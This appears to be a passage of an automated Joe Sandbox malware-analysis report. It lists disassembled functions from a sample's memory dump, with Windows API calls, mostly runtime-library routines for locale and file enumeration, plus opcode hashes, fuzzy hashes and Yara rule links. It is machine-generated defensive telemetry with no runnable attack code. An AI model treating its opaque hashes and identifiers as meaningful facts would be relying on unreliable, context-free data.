                                                                                                                                                                    • Instruction ID: 5672bbdd4d2966991cb5a2a727567365fc41b4ce80bab327c4084f0f6d1f2a1c
                                                                                                                                                                    • Opcode Fuzzy Hash: c18ba2bf37da6e124f6e7769b9b688a62a632d840b0356f68b5586b6a846edef
                                                                                                                                                                    • Instruction Fuzzy Hash: 5A31B574901229EBCF21DF24D98978CBBB8BF48310F5142DAE41CA6251E7709B858F64
                                                                                                                                                                    Function 00DA36A9 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9F807: HeapAlloc.KERNEL32(00000008,?,00D931E1,?,00D9E921,00000001,00000364,00D931E1,00000003,000000FF,?,00D960C1,00D9186C,00D9186A,?,?), ref: 00D9F848
                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DA384A
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00DA393E
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00DA397D
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00DA39B0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2701053895-0
                                                                                                                                                                    • Opcode ID: 8384c15010d3cd844f92c9e0b7ad4d037a2e139fb2f59f4285be3c8da050c5ab
                                                                                                                                                                    • Instruction ID: 00744be61009c0c4023d835671f0839efcc57abd68d8638a315dbb1540cb0af3
                                                                                                                                                                    • Opcode Fuzzy Hash: 8384c15010d3cd844f92c9e0b7ad4d037a2e139fb2f59f4285be3c8da050c5ab
                                                                                                                                                                    • Instruction Fuzzy Hash: D2515AB5A00218AFDF14DF789C85DBEB7BADF86314F284199F449D3201EA309E419B70
                                                                                                                                                                    Function 00DA2FB1 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DA3005
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                    • Opcode ID: 392ca67b660913c7cfcdb8a3dd9a5ba91b4f8deb28169637661206d2efedb790
                                                                                                                                                                    • Instruction ID: eeac996609e33b4ec175f0ca54f06fa79fe26ed6e5e749f39af2ca7624e3a508
                                                                                                                                                                    • Opcode Fuzzy Hash: 392ca67b660913c7cfcdb8a3dd9a5ba91b4f8deb28169637661206d2efedb790
                                                                                                                                                                    • Instruction Fuzzy Hash: 79219272601206ABEF289F29DC42ABB73A9EF46311B14017AFD01D6145EB74EE508B75
                                                                                                                                                                    Function 00DA30D1 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DA3125
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                    • Opcode ID: b68d6bde79616c9ed41f3d6fb3a8a97317fc04eaa9e679b9f3cfe833d96f0dbc
                                                                                                                                                                    • Instruction ID: 1bfed8f33ae0870894d66df68fddda4f644739a7e3bf165d86eb7f6255abe32c
                                                                                                                                                                    • Opcode Fuzzy Hash: b68d6bde79616c9ed41f3d6fb3a8a97317fc04eaa9e679b9f3cfe833d96f0dbc
                                                                                                                                                                    • Instruction Fuzzy Hash: 9711C632611316EBDB14EB68DC42ABA77E9EF06310B14017AF505D7241EB78EE0097B0
                                                                                                                                                                    Function 00DA2C64 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00DA2CFF,00000001,00000000,?,-00000050,?,00DA2AEF,00000000,-00000002,00000000,?,00000055,?), ref: 00DA2CD6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                    • Opcode ID: bcb934da88e1fd6d1e06e0cb10c42a915b89e68c7ec7dbfe774acf6b704f3bfa
                                                                                                                                                                    • Instruction ID: 65c41c4e10ce2841257560bd490553c0b7ff22cd1cbf508a460b6459844815f3
                                                                                                                                                                    • Opcode Fuzzy Hash: bcb934da88e1fd6d1e06e0cb10c42a915b89e68c7ec7dbfe774acf6b704f3bfa
                                                                                                                                                                    • Instruction Fuzzy Hash: 2911293B2003019FDB18AF3DC89167ABB92FF80328B18442CE94687B40D371A942D760
                                                                                                                                                                    Function 00DA327E Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00DA2F1B,00000000,00000000,?), ref: 00DA32AA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                    • Opcode ID: 3b12def7dca144be70795977b98ba9ec4e9a86b04405439a3ed9eae144f8cb5a
                                                                                                                                                                    • Instruction ID: ea4b3078afb54e172ec50d7198b9aeea1a193cb4bbecd07a954716ca2f723869
                                                                                                                                                                    • Opcode Fuzzy Hash: 3b12def7dca144be70795977b98ba9ec4e9a86b04405439a3ed9eae144f8cb5a
                                                                                                                                                                    • Instruction Fuzzy Hash: 3D01D632600212BBDF185A64C846BBA3B55DB41B54F294529FC52A3180EA71FF41C7B8
                                                                                                                                                                    Function 00DA2F52 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00DA2FB1,00000001,?,?,-00000050,?,00DA2AB7,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00DA2F9C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                    • Opcode ID: d11e43c7b6a8a7f986439146e22d5a61420abc0364f7494dcafcf1a69acc7936
                                                                                                                                                                    • Instruction ID: 96ee771d38dd781c3c1dab5ba3d1850b0eb7114bbfb512f292a5e9b181219fbd
                                                                                                                                                                    • Opcode Fuzzy Hash: d11e43c7b6a8a7f986439146e22d5a61420abc0364f7494dcafcf1a69acc7936
                                                                                                                                                                    • Instruction Fuzzy Hash: E2F0F6362043045FDB145F3A9C81A7A7BA1EF81768B09842CF9458B680C7B19C42C670
                                                                                                                                                                    Function 00D9F717 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9B750: EnterCriticalSection.KERNEL32(-00023A67,?,00D98F5A,00000000,00DB44D8,0000000C,00D98F13,?,?,00D9F83A,?,?,00D9E921,00000001,00000364,00D931E1), ref: 00D9B75F
                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00D9F70A,00000001,00DB4928,0000000C,00D9F118,-00000050), ref: 00D9F74F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                                    • Opcode ID: 85ecfe2a29de5eb88fbdfa8e66f9a612e1014163ec4066ca2fa8de24f5253f6f
                                                                                                                                                                    • Instruction ID: f3227b829f6cc0d8d10922fe5075c902b45517f10672c623b2a680ba665dcfdf
                                                                                                                                                                    • Opcode Fuzzy Hash: 85ecfe2a29de5eb88fbdfa8e66f9a612e1014163ec4066ca2fa8de24f5253f6f
                                                                                                                                                                    • Instruction Fuzzy Hash: 96F0EC76A04304DFDB01DF99E842B9D77B0EB49721F10426AE415DB3A1CB7999058FA0
                                                                                                                                                                    Function 00DA3086 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00DA30D1,00000001,?,?,?,00DA2B11,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00DA30BD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                    • Opcode ID: 35d9736f867466ce5e1f316ee234e212412841d8223de1cd929913ee0cea6332
                                                                                                                                                                    • Instruction ID: d3b1d9a75320232e3f07a9ba576f2af1e502773dc9e660ac9a8c9752bbd59c04
                                                                                                                                                                    • Opcode Fuzzy Hash: 35d9736f867466ce5e1f316ee234e212412841d8223de1cd929913ee0cea6332
                                                                                                                                                                    • Instruction Fuzzy Hash: 08F0E53A7003099BCB04AF39D84566ABF95EFC2750B0B4058FA058B291C672DA82C7B4
                                                                                                                                                                    Function 00D9F21C Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00D9A4BC,?,20001004,00000000,00000002,?,?,00D993CE), ref: 00D9F250
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                    • Opcode ID: 0401d3411ca259095fc851bcbcce462f02ba6cb63789a90c1ca3ffa942c68764
                                                                                                                                                                    • Instruction ID: c80fa10876d854d7daf75d5c518318096b1003b71f953411abc5e1523904526f
                                                                                                                                                                    • Opcode Fuzzy Hash: 0401d3411ca259095fc851bcbcce462f02ba6cb63789a90c1ca3ffa942c68764
                                                                                                                                                                    • Instruction Fuzzy Hash: DEE04F36500218FBCF122F60DC05BAE3F15EF44761F044520FD05E5261CB719920AAB9
                                                                                                                                                                    Function 00D95014 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00005135), ref: 00D95019
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                    • Opcode ID: baf3bec6e1c54c3db2e737afb8bfc7bc493ea5e6a194c46838901c08ab78875f
                                                                                                                                                                    • Instruction ID: b75780099d7ba157746100040f4a0cba8b783792bba6c3df286107b388a873ac
                                                                                                                                                                    • Opcode Fuzzy Hash: baf3bec6e1c54c3db2e737afb8bfc7bc493ea5e6a194c46838901c08ab78875f
                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                    Function 00D9FE2C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                    • Opcode ID: 3e3680d5651ea196a823d2468600b792971906299de71bffa8b723659728edfa
                                                                                                                                                                    • Instruction ID: 2364834a9cc59616da45aeabc9853b0779cdb416d09c6eff6d6778e5324c5098
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e3680d5651ea196a823d2468600b792971906299de71bffa8b723659728edfa
                                                                                                                                                                    • Instruction Fuzzy Hash: E3A01230501300DB87008F3569046183A985A041803444114A000C0220DB24C0406F10
                                                                                                                                                                    Function 00DAA222 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCPInfo.KERNEL32(0057FF48,0057FF48,00000000,7FFFFFFF,?,00DAA20D,0057FF48,0057FF48,00000000,0057FF48,?,?,?,?,0057FF48,00000000), ref: 00DAA2C8
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00DAA383
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00DAA412
                                                                                                                                                                    • __freea.LIBCMT ref: 00DAA45D
                                                                                                                                                                    • __freea.LIBCMT ref: 00DAA463
                                                                                                                                                                    • __freea.LIBCMT ref: 00DAA499
                                                                                                                                                                    • __freea.LIBCMT ref: 00DAA49F
                                                                                                                                                                    • __freea.LIBCMT ref: 00DAA4AF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 127012223-0
                                                                                                                                                                    • Opcode ID: 5d30feb95a5c1a0a40ae931941b2a97de51d7494df1646863e40e35b2e585f71
